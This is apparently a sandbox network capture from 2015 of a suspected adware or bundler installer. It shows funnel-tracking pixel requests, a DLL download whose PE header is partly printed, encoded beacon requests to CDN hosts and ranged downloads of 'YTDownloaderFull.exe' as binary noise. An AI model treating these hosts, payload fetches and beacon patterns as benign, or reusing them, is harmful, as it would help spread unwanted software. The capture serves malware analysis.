Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1434694635 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: /zi/SyXIFr0DbC2 M0uoRaLWYCce3bHvuppINZ/SOiuMyXt2SqL72Ac/gxQ3MBddL7ebJsEQqVU=

x-amz-request-id: BB27C75FE68FD466

Date: Fri, 19 Jun 2015 06:17:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Ii0Xp1lM/xquTCBN5ihWiJa3kT4SDuqmbR84kg PulQNmPhS9emrjDK6P4YhCaUSuOjzDS4aLew=

x-amz-request-id: BA45033073DD0623

Date: Fri, 19 Jun 2015 06:17:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: eVr6t4hl4Q05P3vxUXjh/w myWFcDvMiTd8IvlFrYiXC6Z1u/T1gcaAGhGlt3b41NKceZYoA8x8=

x-amz-request-id: EAA1D8DD692D31C6

Date: Fri, 19 Jun 2015 06:17:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: v6RRiangW5tyM3ubTFyOkgr1TrdIui8nxyj/kRuHw/1zjgNCvAOOeRI5TN61DQw46AHocRpawQE=

x-amz-request-id: 945C47FE499B0CE5

Date: Fri, 19 Jun 2015 06:17:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: punz4QBQhjW8LaPWy6eKY8Vu52Ny2I0hC7j0N7hu0mANXlC/W3aG/IePyV0vpyUyTOxqnHJpAy8=

x-amz-request-id: A304EF27DD2E3353

Date: Fri, 19 Jun 2015 06:17:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: punz4Q
BQhjW8LaPWy6eKY8Vu52Ny2I0hC7j0N7hu0mANXlC/W3aG/IePyV0vpyUyTOxqnHJpAy8=
..x-amz-request-id: A304EF27DD2E3353..Date: Fri, 19 Jun 2015 06:17:11 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 4YKnutQx2TMN67HhIL5CorXLrOG9 KbEj NAyAdiiVI7jMZ6i45vXkmZlQTYWzybzbaDeIOJQGM=

x-amz-request-id: D3EDC875EA4D7220

Date: Fri, 19 Jun 2015 06:17:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1434694636 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: dyyNfZDZg0ms5h oRpUQbjjq5DV Ggxgn1IH9UOx5z5zMF4s1NfyOanrj24VV6o28C 1kKFDCxA=

x-amz-request-id: 9292C542C13EA243

Date: Fri, 19 Jun 2015 06:17:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: dyyNfZ
DZg0ms5h oRpUQbjjq5DV Ggxgn1IH9UOx5z5zMF4s1NfyOanrj24VV6o28C 1kKFDCxA=
..x-amz-request-id: 9292C542C13EA243..Date: Fri, 19 Jun 2015 06:17:11 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1434694637 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: bsZFR6r44CWXKZWRCTmjcIVCvlCMGnNvxAYuPti3C7yaGof fP2P70TsEv8VDA3ZX14YnoYhFOM=

x-amz-request-id: 95A36308467C2086

Date: Fri, 19 Jun 2015 06:17:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1434694637 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: XWqMTt8elxf/EojWMvB9JNqBBNjusGu2YoS54Vt4O4IeK6L/llMXzu6a8zIRpS26rFLyquUVweI=

x-amz-request-id: F26A62EF0593E523

Date: Fri, 19 Jun 2015 06:17:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: XWqMTt
8elxf/EojWMvB9JNqBBNjusGu2YoS54Vt4O4IeK6L/llMXzu6a8zIRpS26rFLyquUVweI=
..x-amz-request-id: F26A62EF0593E523..Date: Fri, 19 Jun 2015 06:17:12 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Sat, 23 May 2015 04:43:19 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 42416

X-Cache: Hit from cloudfront

Via: 1.1 4f2e718aa66961c793f5bb10e04e2f20.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Krv04yXA28Ctp3AdQlSuW1LcHHjbZId5o0DbvO8gSatKzyvK1d8kqw==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... [email protected].........................
......@[email protected][email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /t.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qwyt2g70w-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:39 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

GET /t.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qwyt2g70w-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:39 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhskHTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:39 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /9248.ashx?e=WL9usJOVMsMLjT49fHfOTJ5NXDOYkTZjjvdcLv9L0ULeyzV7AofXljlrn0lQQrEE7lajhG3g0DzUUWoGxCZJzECN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOvz6ENhyuEse8oIcxCtq PL6TW/ LqOCtOIOhJMBCe6etK166WwL5YKPiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aO9FTZNpvmTsgqQA5WyV9dawj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlJCMj ozR/VoLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWgA9yXcnOyI0jWC Aygi5UGnmMkfSoa9UeSJzd50JQG7rf7gVRTtqGyUpmLFbLFiWF8xS3bBaukBkUzbxF92/mppRjHrNBKt99xBVxbwNvWYgTanRRPJmLdDIVpmCXjGt3MoS/fu50NKaR9WivOCmrJ14PW2rksgaHr0J3FrrKLLw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:50 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:50 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: Logtva0a0uqpbfMurktavRqkXmWCYGOzKS6Oy2tRyq7gsF/vwpPIIgqgXiuI0cC/

x-amz-request-id: 2D0BC0CA51FEE239

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: MISS

Content-Range: bytes 250000-499999/7202358
......I9........I...Y6.||Kp.......~.._.m'.....T.9.E..:...)............
......,<..F..v..K.5x....Z.5^.^u....Y.%.%...^.M_.g'....~?s`...D.@...
i@X%2.Wy.$,.......a......Q~...X..^y..Sm-....2.`..R..].V..G...Z2;.....K
}.....l...y.....0\Ln.{_..m....}.u.D...s.B.=pak..m..X..1.......T3.5.3_.
.....'...rO...d...............&...0}$.9=.E.. ...#P.]...d.:[email protected].. .A.
v...br..-.bs..5l m....j.D`_.TNp...<..*[email protected].|.z..].A
.j..C.TG.'..;.......%...l./.L(......p.}._.#..;...........)..U.K).m..R.
.5...6<.......r....2...[..yO...D..G.y..du......;.... w.~}...e.E...I
j...MEg.u.I.GU...V.l....`....(..M.......0.DP.Q=k.A [@[email protected].\
.f.^D..r}.>Y0R>C......J..N....o.=FG5L.O@B:.p.#..QT.(........c.lK
|H...) ...?.P....j..lp.TZ5-O.=x....)[email protected]
.^},....,..ow.....Wb.\.....F/..8..._i.k.O.&.D.G$W...>(....>|....
.Pd... .?.~V...pM.(OR.$....1..pC.D...x..PH6.......p.R..u...jd9.?....1)
..uJ.w...\..o|?.D..g.P...............k?.A.f...S.!3..J.i............p.5
.......>(\.....LM...X.D..&F...)_..*..a.....Y......*\1Ip.tR\T`r...27
..s.!O.y.d.C..7.n3................~.B....-p.l7.w...N........C.8.......
.GT.*.1.Z....wU......,...-..j..9h0.,..K^..U..F..<*(.9.ua........Y6.
....[[email protected]....
...t.fL\@.R......3.n.\Hm .d.....~.... .YX`p..w....P.........S.N. .p.O.
....U..b.l.9.e.i........7...B.G5..d.2=......>L{*g..>...r....x$.T
...H...4~.$...D.|k.(_..1M....g.g"....z..{.....y?......3d..bx..,.. ....
D.....%.;h... f&. @.g..-. t.Z<af..N.6.x]..9....6W.R.V."..(.R...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: Logtva0a0uqpbfMurktavRqkXmWCYGOzKS6Oy2tRyq7gsF/vwpPIIgqgXiuI0cC/

x-amz-request-id: 2D0BC0CA51FEE239

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 750000-999999/7202358
".X...&...&N..*....1F\........].GQ^H.(...H.-.........".-...M4w..c.%...
..sE.:..XS....5b.....R.q\..a`._.dm.].U...h.U|../../...5u..(......o..s.
.....-`.S.,.UW-G..YF.}.Q.C& .r.Tf..{2..b...5.{i.....Uv..u#........w..b
 .U..6..V.....}.-._.!.$.Y{L.*..yU..bz.M.&.Z..Sf.p ..7....l[....qp..Z..
-.s.....1...........IQw../..H..e\.b....u.s..j#..S.!......>.H~m...$`
 .Vp.....?.0.3^.u....el.....y..ea..,.v....D)S..[......85.>.x.......
.....OOx.m.]....5Rw.j[=F..FyR.3?..]....0DF.>.'............HL.......
.....g..d..o..e..8'.6s.._....F].2I_.....W.....q*...B...........!&.mN..
..]....0......x...pqG......gM...Ax..I..%.:...]. .:.........a..r.<X|
..af.;........%....~I...J{rQ]UR...X....r.Q.K.u0.2...J..%*-..} c.[.u...
...` 0..*o)...]..5.9....w......A.nh...nK...T....<.?..(...|.q.......
#..^;.S..I.f..A.:....r....EO.1Oi.`......o...8.....v..D..... ......U`l.
?p..Y..;q.7.z..X....QX...8.,Y.%Gc....Q\xm....K....../hZ...............
.....H.......V[... ..........r....9.q.....0.R6?.>.....&.r5...\..rFE
4.m...`......lUa...~NP5 .#S...B>.....Q..2.f...A.x........E.3J......
..paJq..Q..j.....87....2.s......XI....ki.*.D.0zC5...bX...[...f.......A
.....J..ss..Tn....}.&.l.X...v6'..-.....P.|.)>COD.......$..V..V.^6e%
.....{.tc......j.t......1vz..e........... ]F.uU6B...P............F...I
..O........P.s..*.4..qSu..?.../9.......HC.......C.....|&.@..(5U..O..U.
h..=..]..}...H..#..<`....y...{....".'&.1aV.j..W..8...............q.
N..b...u.y...W9..N....:..&.c.k..d............p.......J..,e.!...`.r..K.
W.u.3.#.pB.........Z....{}...lP\......,......V.m.\_..|..,l..@>.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: Logtva0a0uqpbfMurktavRqkXmWCYGOzKS6Oy2tRyq7gsF/vwpPIIgqgXiuI0cC/

x-amz-request-id: 2D0BC0CA51FEE239

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1250000-1499999/7202358
*..Lz.... .8..k..K.T......:vI..V3eP1.....ah;. .X..u...caH.....1s~r....
..g.K..EBl.FU...........xzH./.;=.*.;z......M.IS..t.57..1s.>..JSB...
u......!..TG6...-j...%U.Qz(.. }Ol............AgR...!...\#Ka...TLN\0.#5
..".h..e.P.B..0`Z.W..R....:7N.$./...*.fU.>....7..W..fk....!...v...T
....z..K.O.x..}..N.J,...".D~.......{...3..v:4.....J.......~.\Y.`....w&
#D5~.}...h...7./.b.Qo...a..h.....H...C....5.~..F..w.K..X..R.v...B.qH..
.{;x....0f%wq=&......M.. 1.)...(ije....u^2...f.z.!S-..P([y.&)'r.^M/.1.
.}..Q....._r... i.4]>..7[...c ......w .......q..|..a.,\.j*.....a...
....~..Z.2g.D..R. ~."K.........Z...1..f<.H.o..n.o..`..7..........9'
..K.>.}_.2..V..b .....".4......|BL.....Q3....3.h.)..~L2C.. ..e../b.
.C.ub&Y...0....{...jy....o;N..z..B.\.Z..C....{w.5..x.._j....,o... W.S.
 D......[.P...NR.Yc)..Mw..zZ&7......6..Z.t...~OXT......P....B.m.D.=.3.
. P7.....v...&..T`.Q....{.._{.y.g.....MX.....q........vn.*8..........#
.V ...MT..*[email protected].......|.F`..8.Wd...s..d....U$..... ..=..E.{a
.K.Qjr.........3 ........[9v".......N..\.0Z.P.1........."...u..P9....W
.~u.....2...A.<......-._..4.....q....n.:@A...@{..I.b.......])p.G...
<..#U./..js.M...l..)..,.....&2.`._.'.E..~jTPx....h..= 0...\..#.....
04@......?.'&.....s....p....[9.h...'w(.......e.q..v....H.m?.,..[RZ....
\...Y..Z..sw.Q..SGG.(... ....h..^/...d.3f....iED..zU...U..^C.Z.j|.8hL.
.<.[...G...i.FCc..q!.|...6..u.{e..HL._.B.f.....5..4.Eg..).$..x)....
.tP/l........d...9KV,\_f...Y._.........I......R.......C5n....k^^\....2
..e.6...4?e.yf|...V8..'..Iu....3.F.p.3....;.. ...-...`..-..}.W.`s3<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: Logtva0a0uqpbfMurktavRqkXmWCYGOzKS6Oy2tRyq7gsF/vwpPIIgqgXiuI0cC/

x-amz-request-id: 2D0BC0CA51FEE239

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1500000-1749999/7202358
.Hv.?]u.N.K.b........a.5....Te..8.|....q.....h_..=H......OW........Q..
Yk...7=..(?.l....d.1....z>'........D.!...M.Y..v........f.C:.;..V..u
.3..K....../4.....2]Tl}.{S>.....m.b.......(W....z.c;83'[@.H.{..t.. 
........[UiFTc.....lu.@8../.Y..........^{.,;e..f.X1..\..d..0.....B....
:V.TT#...{..g.5.G..fq.=..|...H.].S......r...E..7.....8.w-..........* .
.^.W.Y..L......Xf..|..^.o.o..........EN...KQG.....G..8[U....V.|..t..Fn
/.=#o....> .i...#d......>...%J.M....!..=.0}.......E.......t..rhZ
6#d..1..m.E.Y.....j.<..(......aW@W.......>....g..b9:.;.{..NL..$ 
.. W.......y.......M.d.k...(#.....q.48]e..XI........z...W.H.w.K......:
%"{:sne[.fx2...d.x..?...Ef.6..V..A.^...u0.@..,.. ..r4E}........k....JV
.0.z.Y'._q.L.#B...pd.*...4.j. .$..6n..].....!..........;..I.M....a....
T./.|...../@F. 6....u.D...%..Z.-.....f1..&lq.i.z...2B_......).Y...V4'.
....O$n..\..x.?..|......\t.s}.7..y...0#..e..2[/)ZW...n_C=V6...T.V.C...
em.>Vd...iA^.?Io.....wY...7~?....{..a.."{.U.....K......'..?....,'.x
.{)...._5...QPB<..R...8.a....]R..,......6.....v%.E...;-....:3{....}
.D1...........^...c..g.F......[...r.3)...'.#./....4..."_v.{.....J...t.
..QT.>......c.o.G..N...}........L.6....XV....p.;[email protected].......
'...........[.WI.....eH. h<7GU...o...d...-....t.. .._.....w........
.D...1.../n...{T.)'.*I&o...Da.x...].f....N..(......W..W.?.b..n....P.&.
..n{U...1.qD.)@.`ok6".....~...C...\ .@Y'.].......... 1.d.. ...N..v.4/1
....g...X........)]....=...P\g...n.?.5K..(..a.v...w%(...l.30.ut.,I...:
..u. [email protected].}...s[h...q....H.!.%.-v<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1750000-1999999/7202358
...C.em...].J. . Xu0:[email protected]..$.q......\.M...dlo....K:.......r. 0..9....
.2U}....p8..F...x.1..Fy.8..........E........`w..b.W.~s....".!F ..u.#..
.&?..f.....Q7.<.f.......y!{[email protected]...<Ot.........?.k,k.
...d..<.Wn.......y...A(th..(D..>..Z.4.HM.?.......vQ.s.<m.....
....y.Za;y7?..I......:.wR..b4........J|.S.,....v..Cl.}[..T1...........
Q..{...R<.....)L.<1..... 6.....N...r-.]S...I..M....)....'.y...].
A..p...$t....Ep.Lh....L..4..}.>.X8...........(..}6f.`..j...cF..s...
.0...wuF..{.........'a.{..K..s.DqTQG.~......~).F.ms8.Lc..........\h9.f
Ss>'..<.b..%....D..?.I.....H..........t.Hi...X....LK...},W....|'
.d.....d..;.hi..2zt4.Lj}~.@N:._M2...........|X..o.!....E..oO..t.&...d.
G.X.....9.oD..:'......F...K.r..{...i.)}`...[/=.W5U..Y....m..#L..*`.J&l
t;*.s.... E......p.6..2........=!.\....[..... ..CK8[...v7.....e.Hx-.'.
..E...i.I.D....E.x.xy/0.4.v......>..^...kS#..4...n.5a.....Q].4s0F]1
...R....I.D.7*[email protected]....". RSq..dl.^6........Y...4S.h.1/=..1/..
3..Y...>.. .....g.c2.*[^..xCf.&...*..:.3V/Y.gv.q.x.@...@.!..n*..N..
K..p. .-.....q..Bqo.V.......u]5.z.....rq..)..2<m...3M.B....._".....
9..W.......D.......yzEHFO....d/..!...l.......ES..c.. [email protected]
Y.:...N)....wX.yU..R..J....n[MAs.'.... ..b......P...4-I;n.E'..B%.$...u
4;.|...$h5.{V...{...u.@..>4.g...Q..5.{,w9...P..B.......5"..I...0.J0
{g..p8..m..9q..x.....Zg.......WsZ[...)[email protected]#y........{..X .]...b.W
2......=!.$...RG.]a..U..6..j}..Z...B.._P..;.......C.....[m.T......6.yT
...0....0..!........I..L...gj...}G9.&..e.l..zl6.g......~..b==l.j..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2250000-2499999/7202358
...v....U3.W....%B.>..f....\O....q.8@.&.5ox.A./..x......]...G..O.6.
.e.:....FI{g.I...3.n!.yS.........O..8.W.^X.I..&f......G....k...... .1.
!.L9"VK-."...#O..&...".6..2....Ih=.... ...0# ...i1..y,.z r...U....m...
58.@=....._o........B.....:.......Uu..9..N:`.....#.#.hQ..:".._B..T.O.=
[email protected]..|...} ..N.......jt...(. 7.......q
.[v.1_......\.B3Y.k7...J.c1./............e.E.....9..k`..x...2.a.L.-...
"..='.K..*...$...)K......f>..........'-`........j2.iK.... .....XUUe
E....2......5...h.ts..*@.].xc%...p.?..=F..../.*.........W<..u..Dw..
i.u.p..?..$.0..^.n...*._6R....0.........(.- ..........ka......\.R$F.*.
b2*.........:..........o..bb..h#&.$....B.RE'.........F$...^..yc...,.gN
.......{..".....CM...........Tq.........*..&..~.9... ..w....o../.K..5.
.k'J....Q.........AKk....z.1fi.U..)U....;'7.T..,..T..;u=...*..k.]..,|G
4b..V......=2.P....A.ap...:.-.Em..q.....o....lB9W#|...s...H.3b.=.r.c..
.{...]Z.<...-.G...)..VC..2.-..&.......\....U$S([email protected]|m.......?He...
S1.6.t^=}2`.o...Y.v.._.a...VnZ....<X-.hL.}p."..H.>}9...Uk.O*..&g
t;}.....]d..3...!w'...N...7........^tm..}.1...a.yg..6.......){s.!.....
